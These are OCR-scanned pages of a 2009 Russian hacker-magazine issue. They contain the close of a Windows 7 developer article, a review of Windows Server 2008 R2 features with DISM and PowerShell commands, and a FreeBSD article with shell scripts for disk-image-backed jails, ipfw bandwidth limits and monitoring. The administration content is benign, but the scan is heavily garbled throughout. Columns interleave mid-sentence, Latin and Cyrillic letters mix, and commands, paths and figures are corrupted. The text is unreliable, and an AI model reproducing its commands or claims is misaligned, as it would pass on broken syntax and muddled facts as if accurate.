сии ОС. Именно позтому нужно начинать приучатьсебя к использованию
API исключительно из официальнойдокументации Если ты закодил
приложение под WindowsVlsta без использования«трюков»,то можешь
спать спокойно. В 99% оно нормально перенесется и будет безошибочно
функционировать и в Windows 7. А если нет ... лучше сразу попытаться
переписать проблемные участки коде или оставить все, как есть, и на­
ЗАКЛЮЧЕНИЕ
в pa'~Kax статьи я рассмотрел далеко не все новые технологии, реа­
лизованные вWiпdоws 7. За кадром остались: Libraris, Windows WEB
Services ит.д. ОБО всех остальных новинкахты всегда можешь прочитать
на официальных ресурсах компании Mlcrosoft [ссылки представлены ВО
врезкеl. Увы, многие из новых технологий еще толком не документирова­
ны и информации по ним нет.

деяться На лучшее. Подводя итог, хочу сказать, что Windows 7, скорее всего, станет следую­

С приложениями, разработанными под Windows Vista, все понятно: с щей «народной» ОС, которую ПО достоинству оценят разные категории

большинством из Них проблем не возникнет. А как быть с те,~и. что были юзеров, а если ОС сможет завоевать сердца пользователей, то и кодеров

оптимизированы и созданы для работы, скажем. в Windows ХР?Увы. но долго ждать не придется. Они махом мигрируют в новую ОС ... Чтож,

из-за провала Windows Vista многие Остались в ХР и продолжали разра­ поживем-увидим, а пока нам остается ждать финального релиза и по­

батывать приложения именно под эту ОС. При пере носе таких программ тихоньку .знакомиться со всеми новинкаМИ.I

ХдКЕР 06/126/09 ~ 113

 JI
» S\'N/ACK

_L_ _•
с!:ргr::й ЯРЕМЧУК

.'НДРЕЙ МАТВЕЕВ

Новое явление
дnиннорога
Wind'ows Serveг 2008 R2: обзор возможностейновой версии
серверной системы

Все силы разработчикови маркетологовМiсгоsоft брошены на реаби­

литацию торговой марки после фактическогопровала затеи с Vista.
В (МИ только и говорят о Windows 7, а о подготовке нового релиза сер­
верной версии Win2k8, получившейлишь скромную прибавку к име­
ни R2, знают немногие. Междутем, тандем из этих двух операционок
способен сделать работу в сети более защищенной, продуктивной
и удобной.

•"
u
ИЗНАЧАЛЬНО для WIN2K8R2
ПРЕДУСМАТРИВАЛОСЬ
как раз тот случай, когда количество перешло
В качество. «Мелких), же усоверщенствований
до Wiп7. Пользователь(подразумевается,

что он сидитза мanомощнымкомпом или

БОЛЕЕ ГРОМКОЕ НАЗВАНIИЕ

<[

,1 Z достаточно миого, Но обо всем по порядку. ТОНl<Имклиентомнод yuрамеииемWindows

)­
if) - Windows Server 7, но на конференции PD Fundamenta!s либо Liпнх), чтобы оонасть
С 2008 бьио объявлено,что новинкабудет ЧТО Н'ОВОГО?Средиосновных на свойдесl<ТОП,удаленно uодключается
называтьсяименно Windows Server 2008 R2, нововведений- обновленная система вир­ к отдельной (VDI полностью изолирует

~I и ее следует рассматривать не как основной,

а как промежуточный релиз. Это нороДИЛО

туanизации Нурег- V 2.0, ноддерживающая

технологию Live Migгation, которая нозволяет

виртуальные среды пользователей) вир­

туальной мащине. VМ может быть либо

путаницу и массувопросов, поскольку сперва «налету» переносить виртуальные мащины жестко закрепленной за ним, либо любой из
всех долго убеждали, что все будет сточностью между физическими серверами. ДинамИ'!ес­ доступных, - это зависит от типа используе·

до наоборот. парни из Мicrosоftнрояснили кое хранилище виртуальных машин нредо· мой инфраструктурыVDI - статическая или
СИ!j'ацию, указав, что в планах корпорации ставлнет в озможность горячего подключения дииамическая. Одним словом, VDI пред­
ВЫПУСI<ать новые версии серверных ОС но и отключения храflИЛИЩ. Физические и ставляет собой своеобразную комбинацию
схеме 2 года (обновление) и 4 года (новый виртуальные системылегко развернуть при RDР-соединений и IJиртуализации.

релиз) , то еClЪ R2 ЯЕЛЯется именно обновле­
нием после Wiп2k8. Вероятно, так поступили,
чтобы не «затенить» выход семерки. Сдругой
стороны, релиз Wiп2k8 бьи радушно принят
специалистами, а изменение названия могло
помощи VНD (Virtual Hard Disk) файлов. и, в
отлИ'!Ие от нредыдущей версии ОС, Hyper-V
Яli1!Яется неотъемлемой частью системы, то
есть, нет разделения на обычные версии и
«withНурег-V».
Служба Тетmiпаl Services переименована в
Remote Desktop Services (RDS), что больще
отражает ее назначеиие - работа в структуре
VDI. Но VDI - не единственное нововведение
в RDS. Поддерживаются многомониторные

бы отпугнуть тех, кто сейчас хочет нриобрести Обновлением Hyper-V тема виртуализации конфигурацин, видео и аудио очеНl, высокого
этуОс. Иначе большинство отложат переход в R2 не исчерпана. Термин «виртуализа­ качества. ПQ1!ьзователи WiH7 MOryт летконо­
и будут дожидаться Wiп7Sеrvег, примерно кщ{ ция» теперь охватывает три технологии: лучить доступ к удаленномуприложению или

сегодня ситуация обстоит cVista иWiп 7. Server Virtualization, СliепtViгtuаlizаtiОI1и рабочему столу при помощи нового ammета
Бета- версИJ! системы сталаДОCl'упна для PreseHtatiol1Virtualization. Отмечается, что RemoteApp & Desktop Сопнесtiон, не чувствуя
загрузки в середине января 2008 года. Точная R2 является полноценным VDI- решением разницы междулокальным и терминальным

дата выхода на данныймоментне афиширу­ (Virtual Desktop Infrastructuгe, инфраструк­ приложениями.

ется, но уже известно, что она придетсяна тура для виртуализацииклиентских рабочих В стандартную поставкувключен обновлен­
НОIJогодниепраздники,Можнонредположить, мест), обеснечивающимцентрализованное ный PowerShe1l2.0, количество изменений
что после анонсаWiп7долго тянутьпе будуг, и управление всеми виртуальнымисистемами в котором, по сравнению с 1.0,ДОCl'аточно

обе системы выйдутесли не одновременно,то и простое предоставлениекомпьютеров. велнко:

снебольшойразницей
. Как это работает? На сервере с поддержкой • У-лучщенный APl;
Список мажорных новинок, анонсированных Hyper-V выполняется множество вирту­ • GШдлясозданиянотладкискрmrroв;
в R2, помещается на одной страннце, ио это альных машин с клиентскими ОС OTWinXP • PowerShell в службах Remote Desktop;
-----jl ----;:-­

,.. ~ 114 ХАКЕР 06 1126/ 09


V/indo ....'s Set""yet""
1'---+----.------­
• ВЫПОЛl-lеl-lие команд на удаленной машипе с
использованием WiпRМ 2.0;
• Фоновое выполнение задач (P$Job);
• Запуск процесса на одной ИJ!И нескольких
маШИl-lах и работа с WPF (Windows Presen ta tion
Fоuпdаtiоп) - новой подсистеме в составе
.NET FTamework3.0, позволяющей создавать
красивые графические интерфейсы.
Улучшены некоторые старые командлеты

(cmdlets), и ПОЯВИJIОСЬ около 240 новых.
В обновленныйIIS (версии 7.5) интегриро­
ваны FТP (с новыми файлами настроек, ос­
нованными I-Ia .NET ХМЦ, WebDav, URLSсап
З.Х (ограl-lичеl-lие типов http-запросов),
Аdmiпistratiоп Pack (управлениеSQI"-базами,
конфигуратор,оТ'!еты, фильтрациязапросов,
www.iis.пеt/ехtеIlsiопs!аdmiпistгаtiопрасk).
Ранее все это бьшо реализованокак отде­
льное расширение,теперь же достаточного
ОДI-IОГО клика мышки. Улучшенаподдержка
РНР в реализацииFastCGI. Еще в IIS 7.0 бьшо
доступносозданиеприложеl-lИЙв изолиро­
bal-ll-lОМ пуле, что способствовалоповыше­
нию УРОВI-IЯ I-Iадежностии безопасности.В
ПS 7.5 каждый пул приложений запускается
с уникальным, менее привилегироваl-lНЫМ
ypOBl-lем подлинности. Кстати, отом, что но­
вому IIS полностью доверяют, свидетельству­
ет и тот факт, что в февр але Мiсrоsоft перевел
свой сайтна версию 7.5.
ХАКЕР 06 /126/ 09
~~~
IЛОКЗЛЬНЗЯ сет!::· I
Сюда же добавим возможность публикации
одним кликом в Visual Studio 10, новые
счетчики производительностии инстру­
ментуправленияWeb Dерlоуmепt Тооl (MS
Deploy), позволяющийадминистраторам
Web-серверовбез труда развертывать,
сннхронизироватьи мигрироватьсайты,
включая конфигурацию,контент и SSL­
сертификаты.
В Servel' Core теперь также можно установить
.NEТ, ВЮlючаяASР.NЕТ и Powel'Shell. Ставим
2.0 апd 3.0 .NET Fl'аrnewоrkнри помощи новой
утиJlliты
DlSM (Deployrnent Image Sеrviciлg апd
Management), котораявходитв стандартную
поставкусистемы и в комплект WAIK (ЮlЮч
/Online позволяетуправлятьнастройками
рабочейсистемы):
> di.sm /Onlj.ne /";nable-Feature /
FeatureName:NetFx2-SеrvеrСоrе
> dism /ОпНпе /Enable-Feature /
FeatureNarne:NetFx3-SеrvеrСоrе
Интересное нововведение ­ возможность до­
полнительнойустановки атрибутов и свойств
на файлы в File Server Resource Маиаgег. Это
фактическисовмещает NTFS с библиотеками
SharePoint идает практическибезграничные
IЮЗМОЖНОСГИДJШобработкифайлов по различ­
ньuмхарактеристикам.
» S'y'N/ACK
11
11
. I .
ОТНЫНЕТОЛЬКО·64,81Т Ранее
сообщалось, что Wiп2k8 будет последней
32-битной версией серверной ОС. Так и
произошло - R2 будет выпущена только
для архитектур хб4!iаб4. Компании AMD и
Intel уже не выпускают32-битныхпроцес­
соров для серверов на базе архитектуры
х8б, поэтомууход с рынка 32-битныхи
смещениеакцентов в CTOpOI-lУ б4-битиых
ОС И приложенийвыглядит вполнелогич­
но. ХОТЯ поддержка 32-битныхнриложений
вR2 осталась и реализоваl-lа при помо­
щи слоя эмуляции WОWб4 (Windows ОП
Wiпdоwsб4).По умолчаниюв версии Server
COl"e н Hyper-V поддержка WОWб4 отключе­
на. Чтобы включнть поддержку 32-БИТI-IЫХ
нрюrожений, администраторудостаточно
выполпить ОДI-lУ команду:
> dism /OnJ.ine /Enable-Feature
FeatureName:ServerCore-WОW64
И­ для поддержки 32-битных .NЕТ-приложе­
иий:
> di.sm /Online /Enable-Feature /
FeatureName:NetFx2-SеrvеrСоrе
> di.sm /Online /Enable-Feature /
F?atureName:NetFx2-SеrvеrСоrе­
.ЮW64
~ 115
 » SYN/ACK

-_._~----- - - ­ -_._--~.

1
,.J() "1) _-:­ - -:::-­

~ .::-...==::::-::._...--_.,_
~:i~~G":
fDt'U~I!'Ie<lH 8N

:.ff;:::-"[,,~':'.- -.,._,.
;~?E:'­ з __....
i,
!E"si.~~s I~=-­
S=; ~==--=:==-'-- :: - ,!
11
J
;;;;;-· ':::. :==::..
-
=:J
,~ <>n....",.......... ..;....
t ~..:.';:;...
...., =:
1.:.. ~.~

~L ...L"J-~~
~~ ~
-[ -r r
EI;";~o.,~

НА РАБОЧЕМ СТОЛЕ ВСЕ ОБНОВЛЕННЫЙ UAC ВДЕйетвии ДЛЯ НЕКОТОРЫХ РОЛЕЙ

СДЕЛАНО В СТИЛЕ WINDOWS 7 ДОСТУПЕН ИНСТРУМЕНТ BEST
PRACТlCE ANAlYSER

Или так: задействовать VPN Reconnect, следует выбрать тип VPN

lКEv2 (Intemet Кеу Ехсhапgе, описанв RFC 4306).
> stдrt Iw ocsettJp ServerCoI'e-WОW64

> star·t /w ocsettJp NetFx2-SеrvеrСоrе-WОWб4 ИНСТРУМЕНТЫ УПРАВЛЕНИЯ Установка

~ Links
Ресурсы по Windows
Server 2008 R2:
• информация для
IТ-профессионалов
новой системы, которая еще В Wiп2k8 бьиа упрощена
Разработчики получили рекомендации по адаптации, до последоватеlIЬНОГО нажатия КlIавищи «Next", в R2
тестированню и проверке СЩIместимосm СIЗоихприложе­ практически не изменилась (кстати, на бете нри установке
ний с WOW64. Но, судя по всему, иснользование 32-бнтных внизу экрана мая'П\т надпись Windows 7). Всю установку
приложеннй не нриветcrвуется. можно произвести бyI(Вально за 6 кликов МЫШЮl, - после
Текущая версия Wiп2k8 ноддерживает до 64 логических несколькихперезагрузоки ввода пароляадминистратора
процессора.В R2 их количество увеличили до 25 б. Учиты­ ПО/IYЧаем готовую сиcrему. В окие региcrрации можно

на Micro:;oft TechNel
=-90.rТ1iсгоsоft.соm
fwli nk/?Li nkl О-660.06
• информация для
разработчиков на
Microsoft MSDN­
o.microsoft.CQfТlL
вая, что в последнее время колнчество ядер на одном физи­
ческом нроцессоре постоянно увеличив ается, такой запас
лишним точно не будет. Причем, если ядра не используют­
ся, их можно ВЫКЛЮЧНTh, тем самым, сэкономив толику
электроэнергии. Виртуальная мащина, запущенная под
новымHyper-V, поддерживает до 32 логических СРИ (в пре­
дыдущем варианте их бьuIO всего 4) . Кстати, подлогичес­
создать дискету для сброса пароля (именно дискету, а не
СО /DVD, так что потребуется флоновод). При создании
разделов жесткого диска мастер по умолчанию создает
два раздела (загрузочный и системный), чтобы не было
проблем с активацией BitLocker.
Субъективно обновленная ОС работает щустрее нредыду­
щей, особенно хорошо это видно под ВИРТУЭIlliaМИ. После

j[ fwlinknLinkld=6 7404.
• сгагьи в Support
1. KnowLedge Base [кВI
- go.microsQ.f.1 COrl'!
fwlinknLinklD~55142.
• новостные группы
Microsoft Соппесt­
90. т iСГОSО([.СОIТ1!
biili nkl?Linkl d=5006?
~ info
101М процессором в Винде понимаетсяне только количест­
во ядер, но и одновременное количество обрабатываемь!х
потоко!3. В сообщениях проскакивало, что Win2k8R2 может
работаTh с 32 4-ядернымипроцессорами,каждоеядро
которых одновременно обрабатываетпо 2 потока данных
(32 СРИ х 4 ядра х 2 нотока данных = 256).
Названы минимальныесиcrемныетребования: 1.4 ГГц
64ЫtСРИ, 512 Мб ММ, HDD 1ОГб_ Рекомендуемые, как ты
понимаеmь, существенно выше. При IUl3нированин кон­
фигурации сервера следует таюке учитывать, что версия
Stапdагd ноддерживает максимум 32 Гб RAiv!, а Епtегрt"isе и
Datacenter до 2 1'6 RAМ_
В R2 доступны и многие другие новинки; некоторые из них
встречались в семерке_ Так, в WiпdоwsFirеwаllможетбыть
активно несколько профилей (Private, PubJic или Domain),
'гro не вызывает проблем при нодключении к нескольким
сетям; добавлена поддержка http-ссылоквQоS, реализова­
загруэки тебя встреmт рабочий стол, стилизованный
подWiп7. чтоБы измеНИTh разрещение экрана, не нужно
вызыв aTh панель Арреаtапсе. Вместо нее JЗ контекстном
меню расположенпункт Screen Rеsоlпtiоп. Все остальные
изменения нроизводятся через "Панель Унравления».
Вообще, по части перестройкиинтерфейсаздесъ доcrаточ­
но изменений,но думаю, тебя интересуютсовсемдругие
инструмеНThI.
Не успели привыкнуть ко всем новшествам Win2k8, как в
R2 получили еще ряд усоверщенствований_ Запустивший­
ея '-разуже «Initial Соnfiguгаtiоп Task», ири номощи которо­
го выполняются первоначальные настройки, не изменил­
ся. Но в Server Мапаgег появилась возможность,которой
ранее явно не хватало -удаленноенодключениек другому
серверу. Теперь достаточно перейти в Action -СOIшесt to
Another Соmрпtеги ввести данные другой системь!, рабо­
тающей под управлением R2. И самое главное: ноддержи­

[ • Обзор Windows 7
с точ ки зрения IT­
ны VPN Rееоппеct и DHCPFailover. Служба QoS позволяет
приоритезировать трафик при доступе к определенным ре­
вается. удаленное управление не только системы В полной
установке, но и в Server Соге_ То есть, у многихадминовне

специалиста смотри сурсам. Ранее во вкладке «Аррlicаtiоп Name" в «Policy-Based будет мук выбора: использоваTh безопасный и быстрый, НО
в предыдущем номе­ QoS» было только ДBaJJyНKTa, при помощи которых можно неудобный/непривычный в управлении Core или уаано­
ре журнала. БЫIIО задать либо все, либо определеI1ные приложения. вить полную систему. Таюке следует отметить, ч'го Server
• Обзор нововведе­ Теперьже вкладка называется. «Application Name ог ИRl», Manager является частью Remote Server Аdministrаtiоп
ний и возможностей и здесъ можно задаTh имл/шаблонhttp-pecypca, трафику ТооlsдляWiп7 (при помощи RSAT можио УПРaJЗЛЯть Wiп2kЗ
\1 Win2k8 смотри которого будетназначаться.повышенныЙ нриоритет. и Win2k8). Вдомеиной '-реде, если eCTh соответстВующие
в статье «Кодовое Новая функцияVPN Reconnect, являющаяся. чаСThЮ RRAS права, проблем с подключением не будет_ А в одноранго­
имя Longhorn» майс­ (<<Служба маршрутизации и дистанционного доступа"), вой сет компьютер, с которого про изводится удаленное
кого номера позволяет VPN- клиенту автоматичесЮl восcrанавливать подключение, должен быть добавлен в «tlllsted host5»
11 VPN-подключение в ситуации, когда связь с VPN·cepBepoM (подробности по WЩRМ СМОТРИJЗ статье «Командный забег
за 2008 год"
временно оборвалась (прежде это нужно былоделаTh вруч­ влагерь Лонгх?рна», опубликованной в февральском номе­

, яую или ВЫЖИДВThДОВОЛЬНО длительный тайм ,,!уТ) , Чтобы pe::r за 2009 год). [~
r ~
i ~ 116
 » SYN/ACK

~iQ"""'",,,,,,,,,,",,,,","

~_JOC й '" j'I;'i!i.!b.-.'!

НОВЫЕ КОМАНДЛЕТЫ СПИСОК РОЛЕЙ И КОМПОНЕНТОВ SERVER MANAGER ТЕПЕРЬ

POWERSHELL УПРОЩАЮТ В WIN2K8R2 ИЗМЕНИЛСЯ ПОЗВОЛЯЕТ УПРАВЛЯТЬ
УПРАВЛЕНИЕ РОЛЯМИ УДАЛЕННОЙ СИСТЕМОЙ

> wiПГП1 set: wiпrШ/СQпfi.g/сli.епс @ ма Иlпересньп:: функций. Нанример, ноявилась корзина Active

Directory Recyc1e Вiп, папоминающая корзипу Windows. Теперь

{TrustedHost:s=" systern, system2"} случайноудаленныйобъект может быть быстро восстановлен.
Учитывая, что рапее операция по реаннмацииучетной записи

При выполнениизадач администрированияUAC момет вме· требовала большихусилий, такая возможностьможет толЪ!{о
шиваться и блокировать работу. Чтобы этого избежать, следует привеТСТIJоваться,

выбрать раздел НКЕУ_LOCAL_МACHINE\SOFTWARE\MicTosoft\ ВосстановленныйизАD RB объект получает все свои атрибуты. По

Wiпdоws\ СuпепtVетsiоп\роliсiеs\sуstеm, где создать параметр умолчанию срок жизни удаленного объекта в AD RB составляет 180
LосаlAссоппtТоkепFiltегРоliсутипа DWORD со значением 1. дпей, после чего он переходитв состояние«Recycle Шп Lifеtiше""
Кстати, если нз-под обычной учетной заниси запускать в консоли теряет атрибуты и через некоторое время полностью удаляет­
команды, требующие прав админа, то можно получить сообщен не ся. Изменить ЭТО значение можно, установив нараметр msDS·

«Elevated реrmissiопs are required то пш .. ,», Решается это нросто: выби­ deletedObjectLifetime. Еслидомен находится на уровне Win2k8R2,
раем в меню«Пус!(»ярлыксmd,ехеивконтекстном меню пу:нкт«Rпп as корзина AD активируется автоматически.
аdmiпistгаtог»,
Новые команметы PowerShell упростили администрирование серве­
Список ролей и компонентов изменился, теперь их количеСТIJО равно 17
ром при помощи командной строки. Перевести домен В Н2 режим очень

и40 (в Wiп2k8-1биЗS),некоторыеролп получилидругоеназвание.

просто:

Например,на сменутехнологииТегmiпаl Selvices ПрИDЩа новая­

Remote Desktop Services, соответственно, поменялось И название. WSUS РЗ С; \> Set-АDr'оrеstМоdе-Idепtitу dоmаiп. ru
теперьявляется частью R2. И его не нужно самостоятельнотянутьиэ -FоrеstМоdе Wiпdоws2008R2Fоrеst:

инета и устанавливать, следя за зависимостями. Б компонентах находим

ВrапсhСасltе (локальное ICЭширование данных, получепных с централь­ Теперь включаемAD НВ:

ного сервера), KOHCQ~b упраn~ения

Direc[Access (упрощает ПОДЮlю­
чение НQ~ьзователей ккорпоративной сети), WinRМ IIS Ехtепsiоп PS С:\> Епаblе-АDОрti.опаlFеаturе -Ident:it:y 'CN=Recycle
(компонент предназнач ен Д1IЯ управления сервером с использованием Ein Feature, СN=Qрtiопаl I'eatures, CN=;Direct:ory
протокола WS-Management), а таюке средства миrрации Windows Server
Migтation Tools (ПОЗВШlЯютпередавать некоторые роли и настройки с Servi.ce, СN=\'iiпdоws NT, CN= Servi се S ,CN=Conf igurat j.on, ос =
серверов Wiп2kЗ-Wiп2k8 в R2), domain, DC=ru' -Зсоре Forest -Target 'доmаiп. ru'

для отдельных ролей (Web-server IIS, AD Domain Services, AD Sertificate

Services, DNS, RDS) достуцен инструмент Беst Practices Analyzer Просмотретьсписокудалеппыхобъектовможно при помощиутилиты

(БРА). Оп поможет настроить роль в соответствии с рекомендаци­ ldp.exe или воспользовавшиськомандлетамиGet-ADО~jесtн Resrore·

ями Microsoft, а в случае возникновения проблем - понять, что же ADObject,

соБС1'венпо произоШ1IO, и прп пеобходимости вернуть системув Б поставке Н2 появилась новая утилита djoin.exe, назначение которой

начальное состояние. Три новых KOMaнд~eTa Д1IЯ PowerShell-Add­ несколЬ!ю необычно - ПОДЮlючение кдомену, который сейчас педо­

WiпdоwsFеаturе, Get-WiпdоwsFеаruгеи Remove-WiпdоwsFеаturепозво­ стуцен. Такая необходимость может понадобиться при развертыв ании

ляют добавить, УДaJtить и просмотреть информацию о выбрапной роли. виртуальных машин И нри заказе преднастроенной техники постав­

Да, чтобы они были достуцны, пе забываем вначале работы загрузить щику, чтобы пе разглашать учетныедапные. Принцип довольнопрост:

модуль Servermanagel·. Например: впачале па системе, нодключенной кдомену при помощи djoin.exe,

создается ХМL-файл, который затем импортируетсяна подключаемой

PS С: \> Import:-Module sеrvепnапаgеr' системе.

Кроме того, обновился центр администрирования Active Directory,

PS С: \> Get-WiпdоwsFеаturе интег рировавший в себя все задачи по управлению AD и заменивший
ADUC (Active Directory Uscrs and Соmрпгегsсопs01е),
И ставимнужный,выбравиз <:пискаего название:
3АКЛЮ'ЧЕНИЕ,ИЛИ ЖДЕМ РЕЛИ3АНОIJОIJведенин
РЗ С: \> Add-\-;iпdоNsFеаt1Jrе-Nаше "Filе-Sелтiсеs" в Win2k8R2 достаточно много, и опи действительноупрощаютмно­
-IпсlLdеАllSuЬFеаtuс8 гие аспекты администрированияWiпdоws-сетеЙ.Конечпо, кокон·
чатеЛЬНОll-ryрелизу 'ГТО'ТО еще может измепитьсяили добавиться.
НОВОЕ BACTIVE DIRECTORY СерIJисАD DS (Active Поэтому, как будет выглядеть финальнаяверсия Wiп2k8R2,покажет
Directory Dоmаiп Services) получил в R2 несколько новых и весь· время. А пока - качаем и тестнруем! I

ХАКЕР 06 '126/ 09 ~ 117

 » S"."N/ACK

ЕВI-ЕНИЙ 30БНИf-l
I JtMfilSYNACK.RU I

Пятьэвеэд...
иотменныи

сервис

Продолжаем' настр'ойку сервиса ПО сдаче в аренду

ВИ1ртуальных FreeBSD серверов

Рассмотрев создание сервиса, мы остановились на вполне работоспо­

собном l<apKace. Он хорошо подходит для частного использования, но
еще далек от применения в среде производственной эксплуатации. Се­
годня мы прикрутим К нашемутворению ограничение ресурсов для каж­

дого виртуального сервера и полноценныи мониторингхост-системы.

11
•
'"
u
РАБОТАНАПИЛЬНИКОМЧтобы
повыситьэффективностьсервиса,я решил
# ср -а

-r' /r..nt
/usr/jailbase/FreeBSD- 'ипате зависитО'Г ресурсовсервера, ширины к-анала и

целевой аудиториисерnиса.

~;: неСJ<ОЛЬКОвидоизменитьero дизайн.Ло- # итОШl;; /гппt Чтобы реаnизоватьвозможностьнютадыва­

(/) гика работыи форматконфигурационньrх # mdсолfig -d -и О
фаЙIIОВосталисьпрежними,однако структура i! rm -Rf /usr/jаilЬаsе/FгееБ8D-
диреr<'Торийпретерпелаизменепия. Вместо luпа.ше -r'
каталоroвдля виртуальныхсерверовтеперь
используютсявиртуаnьныедиски, подключае­ ОГРАНИЧЕНИЯВ прошлойстатье
мые с помощьюкомаидrndcoHtig и шоunt. Это л уномлнуло катало['е/usr/iailbase/collf,
дает большие нреимyrцества: КОТОрЫЙ хранитконфигурационныефайлыдля
ння ограничений,Я модифицировалнесколько
скриптов.Первыйиз них-аddvsеrvег,кото­
рый теперькопи рует nиртуаnьныйдискnместо
базовоroкаталога:
#vi /usr/locaVbin/addvseгveг
fr Кои~руеы и подключtlЕМ образ диска

1. Виртуальный диск копируется заметно разныхтипов а[(){аунтов.Каждыйтакой фаЙII li\kdir $J1Й;,DIR/$IР

быстрее, так что на создание нового окружения содержитнастройкиограничений,которые ср $JAILBASE/ FreeBSD­

уйдет не таКМfЮГО времени. будут наложены](омаидамиaddvseJver и $ {OSVERj . ~{SlZE}. iшаgе

2. ВиртуаlIЬныедиски позволятограничивать startvserver fla виртуальный серnер во время $JAILOIR/${IP} .image

дисковоепространстводля каждоro виртуаль· его создани:я или запуска. Вот примерно е mdсол.f ig -а -t vл.оdе - f

ного сервера. содержимое одного из них: $JAILDIR/${ТР} .image -u 99

3. Упрощаетсямиграциявиртуальныхсерверов mоuпt /dev/md99c $JAILDIR/$IP
с ОДНОЙ машинына другую. # vi /usг/jailbase/conf/base #: Создаем файл инициапизации для но­

Чтобы преобразоnатьбазовыйкаталог /usr/ ~ Размер образа (ограничение диско­ ВО]"'О сервера

jаilЬаsе/FгееВSD-версия из прошлой статьи в вого пространства)

базовый виртуальный диск размером в 2 Гб, SIZE=2g i! Копируем публv.'J:НЫЙ кпюч в катапог

выполни OIедующую носледовательность # Ограничение ПРОI1УСКНОЙ способнос-rи: root/.ssh

комаfЩ: Bp~DWITH=lMbit/s

# Отключаем образ

# ее lf=/dev/zero of=/usr/jailbase/ Создай н заполни конфигурационные файлы wnotlnt $JAILDIR/ ~IP

FreeBSD- 'ипате - у' .2 9 . .\.шаgе bs = lrп ДЛЯ всехтипов аккаунтов, которые будет под­ mdconfig -d -и 99

соuпt=2k держивать сервис:

# bsdlabel -',} -с /usr/jailbase/ Тебе придетсяподготовитьцелый наборбазо'

РгееВSD-' ипате -r' . 2g. j шаgе auto # mkdir /usr/jailbase/conf вых [Зирз'уальныхдисков,по одномуна каждый

# mdсопfig -а -t vnode -f /usr/ # touch /usr/JаilЬаsе/сол.fI тип аккаунта.Скриптstartvserver подключает

jailbase/FreeBSD-' uпате -у' .29. [trial,base,extra,vip} виртуальныйдиски создаетнабор правилДЛЯ

imcJ:ge -Ll О ограниченияПРОПУСКЕ:ОЙспособности.Все
# l,ewfs mdOc Каких·тоособенныхрекомеfЩацийотно­ правилапомещаютсяв отдельныйнабор (set) ,
# пюuпl: /dev/mdOc /тпt: cиTeльHoзначенийопцийдать не могу. Все номер которого раnен Е:омеру виртуального

~ 118 ХАХЕР 0& /126/ 09

диска + 1. Такмы перекладываем работу по уншсализации номеров ipf'" delet.e set. $FWSETNUM

наборов правил на плечи команды rndconfig. ifсопfig $IF i,1et -alio.s $lР

# vi /usr/local/bln/startvserver МОНИТОРИН г ПередтеМ,какприcтynиrьIC настройке системы

# Подключаем виртуальный ДИСК сервера мониториЮ'а, определимся с тем, что же мы все-таки собираемсS! монито­
MDNUM=' rndconfig -п -а -с vnode -1' $JAILOIR/$IP. image' рить. Одним из требований кнашемусервисубыла полная свобода клиен­
rnount. Ide'f/mQ$ (r1D) с $,JAILDIR/$IP та в отношении виртуального сервера. Поэтому мы не можем ВЫПОЛ!-ffiТЬ

echo $MDNUМ > $JAILDIR/$IP. ruп мониторинг сервисов югиеJ>ГОВ, и им придется самим позаботиться об
#: Привязываем виртуалы-!ый сервер к сетевому интерфейсу .. этом. с другой стороны, МЫДОЛЖI-Iыобеспечить бесперебойную работу
ifconfig $IF iпеt. a1ias РР всех виртуальныхсерверов, что потребует постоянного слежения заих
# ... и накладываем ограничени9' на пропускную способность работоспособностью. Создать базовую систему мопиторинга !JИртуаnь­
FWSETNUM=$( ($MDNUM+~)) ных серперов не такуж и сложно. Надо всего лишь взять вьшод утилиты
ipf'" set disable $F\"ISEl'NUM jls и сравнить его со сниском готовых К выполнению серверов (статус
ipf'" адд set. $HISETNUМ pipe $ (FНSЕТNШ1) О ip from апу сО 'ok' в /usr/jailbase/db). Если какой-тосерверготов, но не запущен­
$IP понытатьсяего запуститьи снова сравнитьсписки. Если серверавновь

ipfwadd set. $FWSETNUM pipe $ {FWSЕТNШ1) 1. ip from $IР со

апу

ipfH pjpe $ {F'WSETNUM)О config Ьи $BANDWITH

Оrраничения
ipfw pipe $ {FWSETNUM}l config Ь" $ВДNDWIТН

:lpli<.1 set. епаЫе $FWSETNm~

# Запуска.е}.] сервер

CPU/RAM
в нынешнем состоянии подсистемаjаll-окружений FreeBSD не под­
Скрипт stopvserver удаляетзакреГIЛенныйза виртуальнымсерве­ держивает ограничения на объем виртуальной памяти или время
ром набор правил ipfw и отключаетвиртуальныйдиск. использования процессора. Это серьезный недостаток. надустра­
нением которого работают не первый год В 2006 году Крис Джонс
# vi / usr/local/bin/stopvserver
попал с проектом реализации идеи ограничений на Google Summег
# Отключаем виртуальный диск
of Code IA даже предстаВIAЛ работоспособные патчи для шестой вет­
MDNUM=·cat. $JAILDIR/$IP.run'
ки, однако разработчики FreeBSD не ПрlAНЯЛИ их Позднее Кристо·
umоuпt $JAILDIR/$IP
фер тюнс портировал на FreeBSD 7.0 часть ЭТlAХ патчей. отвечающую
rndсопfig -d -u $MDNUM
за ограНlAчение объемов памяти. но не осилил порт остального кода.
# УдаЛ9'ем празила ipf'" и IР-адрес виртуального серве­ Наработки обоих энтуэиастов доступны на страничке wiki.fгееЬsd.
ра org!Jails. Впрочем, не CTOIAT рассчитывать на стабильность ИЛIA
FWSЕТNШ1=$ ( (МDNUИ~l) ) высокую производительность ядра после наложения патчей.

ХА,КЕР 06 1126/ 09 ~ 119

 ». :=;~·'N/ACK
­
.,', . -

:!_~I~+:~-::~:=г--=-:··-~ -Аь~~}ТJligiУ7--:-~---~=,-- ;:;:7-:-~~.--.~.~~~lнmт;щrтРЕt11)r.fТТ,rll)!flеr:mIТ mJ}1'14I::lТ~;;;{?~::~::-:~_~::·:'-::~;~:~~~~~ЩЧi:'=~Z'~f?I~l ,. • а )(

1, ~~Tu.,nstallin9· .. 1tfilеДsкуме ... 10 I у перевод ... ! у перевод ... ] _11 Inferno's... ! ~tDiscussj... !1tp/an9ch... I o1tl~;l!.[
@@. s @1 ~1" - "Г - (о Ifilе:/IIllsг/lосаl/WWW/mlJПiп/jаil.35012/iЭil-3501;.html O't? -1 ~ . Q О •
~
Overview:: jаil-З5012 :: jаil-З5012 ~

jаil-З5012 :: [ Disk Network Processes System]

Disk

:: Filеsystеш tlsage (iH %)

Filesystem usэgе (in %) Ьу day '" Filesystem usэgе (in %) Ьу week

!:i'"
с>
100

"

120
110 ~ 90
100 ~ во
v
90
~ 70
80 iri
;D 60
70
';f. 60 i' 50
50 -ю
-ю ~O
зо
20
20
10 10
О I , • О
Sun 12:00 MonOO:OO Моп 12:00 27 28 29 30 01 02 03
Cur~ Min: A .... g: Мах: с . . г. ,.,in: Avg.
